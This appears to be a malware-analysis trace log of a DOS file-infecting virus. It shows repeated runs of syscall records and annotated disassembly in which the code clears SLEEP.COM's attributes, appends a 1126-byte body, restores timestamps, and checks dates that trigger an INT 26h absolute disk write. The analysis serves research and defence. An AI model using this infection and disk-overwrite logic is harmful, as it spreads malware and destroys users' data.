0x12cb9: xchg ax, bx  ; handle into BX for the calls that follow
0x12cba: mov ah, 0x40  ; AH=40h: write to file; the trace lines after this excerpt log writes of 4, 2 and 2 bytes
2018-12-25T12:21:17.612521331Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:17.942418207Z 62 PC: 12cac | Close file
2018-12-25T12:21:17.944671168Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:17.957502473Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:17.961027097Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.964370905Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.968242427Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:17.970066474Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.972433439Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:17.982670414Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.986004541Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:17.987727012Z 62 PC: 12d11 | Close file
2018-12-25T12:21:17.997654534Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:18.014031573Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:18.021072834Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.028510491Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.036187671Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.038524489Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.050298641Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.05311889Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.061314544Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.064899595Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.068835995Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.071964054Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.075228228Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.079025345Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.089273373Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.094343441Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.096231447Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.10188162Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:18.115853525Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:18.12341788Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.131575247Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.13668985Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.138893669Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.157162678Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.15915348Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.166829918Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.171377143Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.174718711Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.178318599Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.181058794Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.183533704Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.194750857Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.198290771Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.20063686Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.211077046Z 67 PC: 12d22 | Get or set file attributes (See above)
; Disassembly window at the return address of DOS Get date (INT 21h AH=2Ah returns
; DH=month, DL=day). Linear disassembly: 0x12b7b-0x12b86 follow an unconditional
; jmp and appear to be data decoded as instructions.
2018-12-25T12:21:18.248678051Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606  ; DH:DL == 06:06, i.e. 6 June
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94  ; any other date; the trace continues with the chdir calls at 12d9f/12da6 (run settings on this page give 1 January)
0x12b78: jmp 0x12d28  ; date matched: date-triggered path at 0x12d28 (not shown)
0x12b7b: and ah, bh  ; NOTE(review): likely data, not code
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B; 55 8B EC from 0x12b84 would be push bp / mov bp, sp - decoder looks desynchronised, confirm against raw bytes
0x12b86: in al, dx  ; NOTE(review): byte EC, probably the tail of mov bp, sp rather than a port read
0x12b87: sub sp, 0x2c  ; 0x2c bytes of stack locals, used as the DTA below
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DTA = the local buffer
0x12b93: int 0x21
0x12b95: mov ah, 0x4e  ; AH=4Eh: find first
0x12b97: mov cx, 0x10  ; attribute mask 0x10 = directory
0x12b9a: mov dx, 0x1b8  ; DS:DX = search pattern at 0x1b8 (contents not shown)
2018-12-25T12:21:18.252453186Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:18.257136318Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8543,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Disassembly window at the return address of DOS Get date (INT 21h AH=2Ah returns
; DL=day of month, DH=month, AL=day of week). The trace reaches this call site twice
; per file, before and after the 1126-byte write at 12a98. Linear disassembly:
; lines after an unconditional jmp or ret may not be reachable code.
2018-12-25T12:21:17.766935367Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; day of month == 2 ?
0x12a5d: je 0x12a62  ; yes -> disk-write path below
0x12a5f: jmp 0x12a80  ; no -> straight to ret (run settings on this page give Day 1, so presumably this is the path taken here)
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq  ; NOTE(review): one-byte opcode; in 16-bit code this is CWD (DX <- sign of AX) - confirm
0x12a66: mov cx, 0x100  ; CX = 0x100, the sector count in the INT 26h register layout
0x12a69: int 0x26  ; DOS absolute disk write (AL=drive, CX=sectors, DX=first sector, DS:BX=buffer): destructive-payload indicator
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3  ; presumably a second INT 26h set-up: AL=3 would be drive D: (0=A) - confirm
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62  ; NOTE(review): printed target is outside the traced range; with 16-bit wrap of the displacement it would be 0x12a62 (the INT 26h path) - confirm
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]  ; past the ret; belongs to whatever follows this routine
2018-12-25T12:21:17.770169656Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:17.787009347Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:17.791340536Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:17.792271019Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:17.799412419Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:17.807337877Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
; Disassembly window at the return address of DOS Get time (INT 21h AH=2Ch returns
; DH=seconds, DL=hundredths). The INT 21h calls below line up with the next trace
; rows: attributes at 12ca8, close at 12cac, open at 12cb1.
2018-12-25T12:21:17.814521805Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh  ; DL = hundredths + seconds
0x12c90: je 0x12c8a  ; a zero sum is rejected; 0x12c8a is not shown, presumably it re-reads the time
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]  ; SI = 0x115 + word stored at DS:0x106
0x12c99: mov byte ptr [si], dl  ; non-zero time-derived byte saved; presumably a per-infection key - confirm
0x12c9b: mov ax, 0x4301  ; AX=4301h: set file attributes
0x12c9e: xor cx, cx  ; CX=0 clears every attribute, read-only included
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca  ; DS:DX = path string at SI+0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e  ; AH=3Eh: close the handle (BX is set outside this window)
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02  ; AX=3D02h: reopen with access mode 2 (read/write)
0x12caf: int 0x21
0x12cb1: jb 0x12c63  ; CF set means the open failed; 0x12c63 is not shown
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax  ; store the new handle (AX) at ES:[DX+0x63]
0x12cb9: xchg ax, bx  ; handle -> BX for the calls that follow
0x12cba: mov ah, 0x40  ; AH=40h: write; the trace logs the first write at 12cc4
2018-12-25T12:21:17.822695587Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:17.941583812Z 62 PC: 12cac | Close file
2018-12-25T12:21:17.943815575Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:17.952271952Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:17.960063961Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.96343278Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.967493804Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:17.974014842Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.976580295Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:17.98721512Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.990288826Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:17.992346848Z 62 PC: 12d11 | Close file
2018-12-25T12:21:18.002579124Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:18.01450919Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:18.017933964Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.025425983Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.033764602Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.03619587Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.047295065Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.050317738Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.057822495Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.060972977Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.06881219Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.072218223Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.074294778Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.079684418Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.089573057Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.092586728Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.095093724Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.103902797Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:18.116092697Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:18.119180067Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.127480517Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.135032034Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.137964446Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.147073909Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.148374572Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.152891671Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.15560339Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.158293397Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.160572114Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.162602724Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.164397594Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.171722011Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.174150988Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.175509856Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.181273517Z 67 PC: 12d22 | Get or set file attributes (See above)
; Disassembly window at the return address of DOS Get date (INT 21h AH=2Ah returns
; DH=month, DL=day). Linear disassembly: 0x12b7b-0x12b86 follow an unconditional
; jmp and appear to be data decoded as instructions.
2018-12-25T12:21:18.188928947Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606  ; DH:DL == 06:06, i.e. 6 June
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94  ; any other date; the trace continues with the chdir calls at 12d9f/12da6 (run settings on this page give 1 January)
0x12b78: jmp 0x12d28  ; date matched: date-triggered path at 0x12d28 (not shown)
0x12b7b: and ah, bh  ; NOTE(review): likely data, not code
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B; 55 8B EC from 0x12b84 would be push bp / mov bp, sp - decoder looks desynchronised, confirm against raw bytes
0x12b86: in al, dx  ; NOTE(review): byte EC, probably the tail of mov bp, sp rather than a port read
0x12b87: sub sp, 0x2c  ; 0x2c bytes of stack locals, used as the DTA below
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DTA = the local buffer
0x12b93: int 0x21
0x12b95: mov ah, 0x4e  ; AH=4Eh: find first
0x12b97: mov cx, 0x10  ; attribute mask 0x10 = directory
0x12b9a: mov dx, 0x1b8  ; DS:DX = search pattern at 0x1b8 (contents not shown)
2018-12-25T12:21:18.190589732Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:18.193783126Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8543,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Disassembly window at the return address of DOS Get date (INT 21h AH=2Ah returns
; DL=day of month, DH=month, AL=day of week). The trace reaches this call site twice
; per file, before and after the 1126-byte write at 12a98. Linear disassembly:
; lines after an unconditional jmp or ret may not be reachable code.
2018-12-25T12:21:17.948512615Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; day of month == 2 ?
0x12a5d: je 0x12a62  ; yes -> disk-write path below
0x12a5f: jmp 0x12a80  ; no -> straight to ret (run settings on this page give Day 1, so presumably this is the path taken here)
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq  ; NOTE(review): one-byte opcode; in 16-bit code this is CWD (DX <- sign of AX) - confirm
0x12a66: mov cx, 0x100  ; CX = 0x100, the sector count in the INT 26h register layout
0x12a69: int 0x26  ; DOS absolute disk write (AL=drive, CX=sectors, DX=first sector, DS:BX=buffer): destructive-payload indicator
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3  ; presumably a second INT 26h set-up: AL=3 would be drive D: (0=A) - confirm
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62  ; NOTE(review): printed target is outside the traced range; with 16-bit wrap of the displacement it would be 0x12a62 (the INT 26h path) - confirm
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]  ; past the ret; belongs to whatever follows this routine
2018-12-25T12:21:17.953960105Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:17.957601979Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:17.962540501Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:17.965953195Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:17.980703779Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:17.985097319Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
; Disassembly window at the return address of DOS Get time (INT 21h AH=2Ch returns
; DH=seconds, DL=hundredths). The INT 21h calls below line up with the next trace
; rows: attributes at 12ca8, close at 12cac, open at 12cb1.
2018-12-25T12:21:17.990798903Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh  ; DL = hundredths + seconds
0x12c90: je 0x12c8a  ; a zero sum is rejected; 0x12c8a is not shown, presumably it re-reads the time
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]  ; SI = 0x115 + word stored at DS:0x106
0x12c99: mov byte ptr [si], dl  ; non-zero time-derived byte saved; presumably a per-infection key - confirm
0x12c9b: mov ax, 0x4301  ; AX=4301h: set file attributes
0x12c9e: xor cx, cx  ; CX=0 clears every attribute, read-only included
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca  ; DS:DX = path string at SI+0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e  ; AH=3Eh: close the handle (BX is set outside this window)
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02  ; AX=3D02h: reopen with access mode 2 (read/write)
0x12caf: int 0x21
0x12cb1: jb 0x12c63  ; CF set means the open failed; 0x12c63 is not shown
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax  ; store the new handle (AX) at ES:[DX+0x63]
0x12cb9: xchg ax, bx  ; handle -> BX for the calls that follow
0x12cba: mov ah, 0x40  ; AH=40h: write; the trace logs the first write at 12cc4
2018-12-25T12:21:17.992705455Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:18.01246251Z 62 PC: 12cac | Close file
2018-12-25T12:21:18.014687442Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:18.022391455Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:18.029848944Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.032857183Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.035993343Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:18.037441616Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.039679239Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:18.050111206Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.052698242Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:18.054462638Z 62 PC: 12d11 | Close file
2018-12-25T12:21:18.068722576Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:18.080584254Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:18.0840467Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.092812401Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.099966054Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.102398137Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.114445459Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.11663824Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.1241647Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.127680739Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.135177453Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.140018644Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.142855647Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.148967506Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.162141376Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.164668926Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.166964421Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.175767653Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:18.187412038Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:18.191796073Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.199787734Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.207607147Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.211480879Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.223859687Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.226394727Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.234677549Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.237777287Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.240729935Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.244241067Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.247020116Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.250358039Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.262033194Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.264524047Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.265714389Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.271383524Z 67 PC: 12d22 | Get or set file attributes (See above)
; Disassembly window at the return address of DOS Get date (INT 21h AH=2Ah returns
; DH=month, DL=day). Linear disassembly: 0x12b7b-0x12b86 follow an unconditional
; jmp and appear to be data decoded as instructions.
2018-12-25T12:21:18.279320747Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606  ; DH:DL == 06:06, i.e. 6 June
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94  ; any other date; the trace continues with the chdir calls at 12d9f/12da6 (run settings on this page give 1 January)
0x12b78: jmp 0x12d28  ; date matched: date-triggered path at 0x12d28 (not shown)
0x12b7b: and ah, bh  ; NOTE(review): likely data, not code
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B; 55 8B EC from 0x12b84 would be push bp / mov bp, sp - decoder looks desynchronised, confirm against raw bytes
0x12b86: in al, dx  ; NOTE(review): byte EC, probably the tail of mov bp, sp rather than a port read
0x12b87: sub sp, 0x2c  ; 0x2c bytes of stack locals, used as the DTA below
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DTA = the local buffer
0x12b93: int 0x21
0x12b95: mov ah, 0x4e  ; AH=4Eh: find first
0x12b97: mov cx, 0x10  ; attribute mask 0x10 = directory
0x12b9a: mov dx, 0x1b8  ; DS:DX = search pattern at 0x1b8 (contents not shown)
2018-12-25T12:21:18.281395653Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:18.284844715Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8543,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Disassembly window at the return address of DOS Get date (INT 21h AH=2Ah returns
; DL=day of month, DH=month, AL=day of week). The trace reaches this call site twice
; per file, before and after the 1126-byte write at 12a98. Linear disassembly:
; lines after an unconditional jmp or ret may not be reachable code.
2018-12-25T12:21:18.173749779Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; day of month == 2 ?
0x12a5d: je 0x12a62  ; yes -> disk-write path below
0x12a5f: jmp 0x12a80  ; no -> straight to ret (run settings on this page give Day 1, so presumably this is the path taken here)
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq  ; NOTE(review): one-byte opcode; in 16-bit code this is CWD (DX <- sign of AX) - confirm
0x12a66: mov cx, 0x100  ; CX = 0x100, the sector count in the INT 26h register layout
0x12a69: int 0x26  ; DOS absolute disk write (AL=drive, CX=sectors, DX=first sector, DS:BX=buffer): destructive-payload indicator
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3  ; presumably a second INT 26h set-up: AL=3 would be drive D: (0=A) - confirm
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62  ; NOTE(review): printed target is outside the traced range; with 16-bit wrap of the displacement it would be 0x12a62 (the INT 26h path) - confirm
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]  ; past the ret; belongs to whatever follows this routine
2018-12-25T12:21:18.176567398Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:18.179797964Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:18.191654681Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:18.192921187Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:18.198045844Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:18.202724161Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
; Disassembly window at the return address of DOS Get time (INT 21h AH=2Ch returns
; DH=seconds, DL=hundredths). The INT 21h calls below line up with the next trace
; rows: attributes at 12ca8, close at 12cac, open at 12cb1.
2018-12-25T12:21:18.207590822Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh  ; DL = hundredths + seconds
0x12c90: je 0x12c8a  ; a zero sum is rejected; 0x12c8a is not shown, presumably it re-reads the time
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]  ; SI = 0x115 + word stored at DS:0x106
0x12c99: mov byte ptr [si], dl  ; non-zero time-derived byte saved; presumably a per-infection key - confirm
0x12c9b: mov ax, 0x4301  ; AX=4301h: set file attributes
0x12c9e: xor cx, cx  ; CX=0 clears every attribute, read-only included
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca  ; DS:DX = path string at SI+0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e  ; AH=3Eh: close the handle (BX is set outside this window)
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02  ; AX=3D02h: reopen with access mode 2 (read/write)
0x12caf: int 0x21
0x12cb1: jb 0x12c63  ; CF set means the open failed; 0x12c63 is not shown
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax  ; store the new handle (AX) at ES:[DX+0x63]
0x12cb9: xchg ax, bx  ; handle -> BX for the calls that follow
0x12cba: mov ah, 0x40  ; AH=40h: write; the trace logs the first write at 12cc4
2018-12-25T12:21:18.209855191Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:18.222630319Z 62 PC: 12cac | Close file
2018-12-25T12:21:18.224850905Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:18.234761207Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:18.23827597Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.241586027Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.24540749Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:18.24714878Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.249896596Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:18.262428937Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.265253038Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:18.267394058Z 62 PC: 12d11 | Close file
2018-12-25T12:21:18.276889537Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:18.288454797Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:18.29152625Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.29896298Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.307118912Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.310002107Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.321212409Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.324292472Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.332074826Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.335482726Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.339384468Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.341379648Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.342728954Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.344821569Z 64 PC: 12a98 | Write file or device (See above)
